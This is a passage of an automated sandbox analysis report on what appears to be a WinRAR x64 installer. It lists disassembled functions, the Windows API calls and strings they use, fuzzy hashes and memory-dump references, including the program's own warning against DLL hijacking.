ws2help.dll, xrefs: 00007FF6C3BAA674
comres.dll, xrefs: 00007FF6C3BAA65E
peerdist.dll, xrefs: 00007FF6C3BAA903
wkscli.dll, xrefs: 00007FF6C3BAA85B
uxtheme.dll, xrefs: 00007FF6C3BAAB7E
dfscli.dll, xrefs: 00007FF6C3BAA869
usp10.dll, xrefs: 00007FF6C3BAA648
sfc_os.dll, xrefs: 00007FF6C3BAA5FB

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$xlistpos
API String ID: 1466332177-2059703551
Opcode ID: 4f4d2e665c102e2b0202718de5bc8b4036e7805afb087b8b46c1cccf70c400bf
Instruction ID: 86bb80539204c66cfc381ff30a15bfaa4276ee310ecd0ef0de4b7d3399d1787d
Opcode Fuzzy Hash: 4f4d2e665c102e2b0202718de5bc8b4036e7805afb087b8b46c1cccf70c400bf
Instruction Fuzzy Hash: 50322E31A09F8299EB119F64E8429E973B4FF66315F504236DACCA6769EF3CD249C340

Function 00007FF6C3BB8B00 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6C3BB8754: DloadProtectSection.DELAYIMP ref: 00007FF6C3BB87C5

RaiseException.KERNEL32 ref: 00007FF6C3BB8BA7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6C3BB8B93

Part of subcall function 00007FF6C3BB8A64: DloadProtectSection.DELAYIMP ref: 00007FF6C3BB8AC3

LoadLibraryExA.KERNEL32 ref: 00007FF6C3BB8C46
GetLastError.KERNEL32 ref: 00007FF6C3BB8C54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6C3BB8C86
RaiseException.KERNEL32 ref: 00007FF6C3BB8C9A

Strings

H, xrefs: 00007FF6C3BB8B74

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: 08df8d98a9dad4dac36af99e044c8b654dd9a4f13edfbee5db96de11301e47a4
Instruction ID: 6e62dcc1656ba83ad6f7c6bac44f0144c273b530e8dc5f1f46f03bcc2d3ff8fa
Opcode Fuzzy Hash: 08df8d98a9dad4dac36af99e044c8b654dd9a4f13edfbee5db96de11301e47a4
Instruction Fuzzy Hash: 90915032A05B5186EB40CF65D881AAC73A1FB29B9AF05453ADECDAB758DF38E445C300

Function 00007FF6C3BB07C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32 ref: 00007FF6C3BB07FD

Part of subcall function 00007FF6C3BB0990: LoadCursorW.USER32 ref: 00007FF6C3BB09D9
Part of subcall function 00007FF6C3BB0990: RegisterClassExW.USER32 ref: 00007FF6C3BB0A04

GetWindowRect.USER32 ref: 00007FF6C3BB083E
GetParent.USER32 ref: 00007FF6C3BB0847
MapWindowPoints.USER32 ref: 00007FF6C3BB085D
GetParent.USER32 ref: 00007FF6C3BB0888
CreateWindowExW.USER32 ref: 00007FF6C3BB08CF
ShowWindow.USER32 ref: 00007FF6C3BB090E
ShowWindow.USER32 ref: 00007FF6C3BB093A
UpdateWindow.USER32 ref: 00007FF6C3BB0944

Strings

RarHtmlClassName, xrefs: 00007FF6C3BB08C4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Window$Show$Parent$ClassCreateCursorLoadPointsRectRegisterUpdate
String ID: RarHtmlClassName
API String ID: 1583632621-1658105358
Opcode ID: 2b70092a86cac6ffc10dd9a14848574c8ad0378229ad06ef114b750902a6c3d4
Instruction ID: 42e64d33230ecaa6fe370fe38f5143ecb7877293e4613d310989c9d32ae450cd
Opcode Fuzzy Hash: 2b70092a86cac6ffc10dd9a14848574c8ad0378229ad06ef114b750902a6c3d4
Instruction Fuzzy Hash: A641B276B08B4186EB18CF19E496B7973A1EBAAB96F054035DDCD97754CF3CE0458B00

Function 00007FF6C3BCB170 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 00007FF6C3BCB2EC
GetProcAddress.KERNEL32 ref: 00007FF6C3BCB2F8

Strings

api-ms-, xrefs: 00007FF6C3BCB236
ext-ms-, xrefs: 00007FF6C3BCB249

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 57a8b596a1503f26f6ff46af51ce6bc8fd40067f29b5d6761e983004135d4d5f
Instruction ID: a83f741af24929793694f46139cc21d39025b2988dfbe1235ce7b62bfe5ff90f
Opcode Fuzzy Hash: 57a8b596a1503f26f6ff46af51ce6bc8fd40067f29b5d6761e983004135d4d5f
Instruction Fuzzy Hash: 76410421B19A1282EA25DF16A8069BD2791BF67BE2F084135DDCDEB788DF3CE445C344

Function 00007FF6C3BBF9BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA41
GetLastError.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA4F
LoadLibraryExW.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFA79
FreeLibrary.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFABF
GetProcAddress.KERNEL32(?,?,?,00007FF6C3BBFC6E,?,?,?,00007FF6C3BBF960,?,?,00000001,00007FF6C3BBC679), ref: 00007FF6C3BBFACB

Strings

api-ms-, xrefs: 00007FF6C3BBFA61

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bae88bc27c21ad60c76f677b5c45fa165faed71e7c4ca7cdbe25b1edddfacdfe
Instruction ID: 749d8a7ddf4264d066b2329061b243d2c335a53bf29fc789a033ff5f3c987aea
Opcode Fuzzy Hash: bae88bc27c21ad60c76f677b5c45fa165faed71e7c4ca7cdbe25b1edddfacdfe
Instruction Fuzzy Hash: 0631D421B1AB42C1EE159F02A84297563E4FF6AFAAF594535DDDDAA394DF3CE040C700

Function 00007FF6C3BB0DE0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6C3BB1317), ref: 00007FF6C3BB0EFC

Strings

</html>, xrefs: 00007FF6C3BB0E93
, xrefs: 00007FF6C3BB0E38
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF6C3BB0E24
<html>, xrefs: 00007FF6C3BB0E4E
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF6C3BB0E67

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AllocGlobal
String ID: $</html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 3761449716-2515208629
Opcode ID: 125e7bda62205f68ffd57646446bb67724558c50e9972ca4f8095c52de3b50cb
Instruction ID: fbf8c5f6a3c54837f1097230383adf674554cd7631d7d6fd404e243ef3c6f6a5
Opcode Fuzzy Hash: 125e7bda62205f68ffd57646446bb67724558c50e9972ca4f8095c52de3b50cb
Instruction Fuzzy Hash: 79414312F08A0695EB14DF61D892BFD2370AF65789F444431DDCDAA6AADF38D509C340

Function 00007FF6C3BC7458 Relevance: 9.1, APIs: 6, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC7467
FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC749D
FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74CA
FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74DB
FlsSetValue.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC74EC
SetLastError.KERNEL32(?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000,00007FF6C3BCB137,?,?,?), ref: 00007FF6C3BC7507

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: ba828b49eb28cf8f14636659f097d3729cc1d46c627f16ccd11c1666027e59fe
Instruction ID: 7e27d1ffbe7f1ef6ce2b4def9250d9dfe08b86d039df63da09c4df1acd8e9ef3
Opcode Fuzzy Hash: ba828b49eb28cf8f14636659f097d3729cc1d46c627f16ccd11c1666027e59fe
Instruction Fuzzy Hash: 10118C20B0824246FA34BF36B683C7D61865FA67B2F040775E9EEE66C6DF2CE4018300

Function 00007FF6C3BA0580 Relevance: 7.6, APIs: 5, Instructions: 131
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF6C3BA063A
GetLastError.KERNEL32 ref: 00007FF6C3BA064D
CreateFileW.KERNEL32 ref: 00007FF6C3BA069D
GetLastError.KERNEL32 ref: 00007FF6C3BA06A6
SetFileTime.KERNEL32 ref: 00007FF6C3BA070D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: dcfe0a08d1e0b445740c6a5767d5a0c50ae79fd6602f16daa682fc2f45f2860c
Instruction ID: 94bba48cba4f6148c378fdeac4be251f65b7981e8634e34fd628b17662baf0f4
Opcode Fuzzy Hash: dcfe0a08d1e0b445740c6a5767d5a0c50ae79fd6602f16daa682fc2f45f2860c
Instruction Fuzzy Hash: 18510762A0864146FB209F25E056BB96760FBA6779F040335DEEEA7AD1CF3DD454CB00

Function 00007FF6C3BB28E8 Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF6C3BB28FE
GetMessageW.USER32 ref: 00007FF6C3BB2915
IsDialogMessageW.USER32 ref: 00007FF6C3BB292C
TranslateMessage.USER32 ref: 00007FF6C3BB293B
DispatchMessageW.USER32 ref: 00007FF6C3BB2946

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 2d41d9326857e66844fb115c9f216b9fd577e98702e5580aa58207ff4f5c7ede
Instruction ID: 3a49d03c8a41cca37be6368c45b8fc108446f94b5ec0076c7e2249ba8863a958
Opcode Fuzzy Hash: 2d41d9326857e66844fb115c9f216b9fd577e98702e5580aa58207ff4f5c7ede
Instruction Fuzzy Hash: 9EF0E129B2894282EB649F28E896E762350FFA6B0AF806131D5CE95854DF2CD118CB00

Function 00007FF6C3BB4688 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6C3BB43C4), ref: 00007FF6C3BB46AF
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6C3BB470C

Strings

sfxcmd, xrefs: 00007FF6C3BB46A8
sfxpar, xrefs: 00007FF6C3BB4705

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: f874a795e08bc184904b055741577f64434ce22e78270947d9c465dc1e555f4f
Instruction ID: 638b921ff17bc20aea1896f09f87f0ceb85945793e01cd334106abc85b2140aa
Opcode Fuzzy Hash: f874a795e08bc184904b055741577f64434ce22e78270947d9c465dc1e555f4f
Instruction Fuzzy Hash: F8111261E1CA0A41EA14AF11E853AB97360FFB7796F441131E5CEAA2A6DE2CD149C740

Function 00007FF6C3BB19F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF6C3BB1A19
SHAutoComplete.SHLWAPI ref: 00007FF6C3BB1A5D

Part of subcall function 00007FF6C3BACB10: CompareStringW.KERNEL32 ref: 00007FF6C3BACB2F

FindWindowExW.USER32 ref: 00007FF6C3BB1A47

Strings

EDIT, xrefs: 00007FF6C3BB1A23, 00007FF6C3BB1A3B

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: a3730f09f30549a015c781de93191d6efbc31bd36ef359d9da3c26f4bf0f9089
Instruction ID: 6af27cbd1d804597014a9e5336ae9a53793add5c11e04aa99ef5eb329087dcc5
Opcode Fuzzy Hash: a3730f09f30549a015c781de93191d6efbc31bd36ef359d9da3c26f4bf0f9089
Instruction Fuzzy Hash: CF018625B08B4281FA64AF15F852B756390BF6B786F442431CDCDAA654DE3CE104CB50

Function 00007FF6C3BB2794 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BAAD40: GetSystemDirectoryW.KERNEL32 ref: 00007FF6C3BAAD8F
Part of subcall function 00007FF6C3BAAD40: LoadLibraryW.KERNEL32 ref: 00007FF6C3BAADF9

OleInitialize.OLE32 ref: 00007FF6C3BB27AE
GdiplusStartup.GDIPLUS ref: 00007FF6C3BB27E6
SHGetMalloc.SHELL32 ref: 00007FF6C3BB27F3

Strings

riched20.dll, xrefs: 00007FF6C3BB279D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: c0c4354b3a722462936f22d72a1057884a4e333d87d77a2b0ef64c4271690ca3
Instruction ID: 625d5ce6f7b5cebe1f3f17a4fbafff9f9543d3791efebcc71698f27def9f3bb5
Opcode Fuzzy Hash: c0c4354b3a722462936f22d72a1057884a4e333d87d77a2b0ef64c4271690ca3
Instruction Fuzzy Hash: 69F09635A08A4782EB409F24F4565697360FFAA706F400031D5CE96AA4DF7CD64DCF00

Function 00007FF6C3BB2EEC Relevance: 6.1, APIs: 4, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF6C3BB2F34
RegQueryValueExW.ADVAPI32 ref: 00007FF6C3BB2F65
RegQueryValueExW.ADVAPI32 ref: 00007FF6C3BB2FE7
RegCloseKey.ADVAPI32 ref: 00007FF6C3BB3026

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 28a070677619c59ed845ba7aa30c74b9fadcb3fd9c6e5316b8293aa6b47e6f28
Instruction ID: 5eb9bdc6d5cff7b28cef530db656e39c72cd3a92d94600d3b165f5e367214042
Opcode Fuzzy Hash: 28a070677619c59ed845ba7aa30c74b9fadcb3fd9c6e5316b8293aa6b47e6f28
Instruction Fuzzy Hash: BF419C26B14A0189EB10DF61D842AED37B4FF6AB84B805032EEDDA7B59DF38D545C780

Function 00007FF6C3BB9D1C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6C3BB9D2B

Part of subcall function 00007FF6C3BB97A4: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6C3BB97C6

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6C3BB9D40
__scrt_release_startup_lock.LIBCMT ref: 00007FF6C3BB9DAE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6C3BB9E01

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: b1a589d711ce5c113e8e4a51647d4a5db0ae59c4c3c3c73f71d1b0031afe7af5
Instruction ID: ab1bbe10392df1c1125beeab4a48bae66ffb92f73a1989e592b06ced2d7fdf08
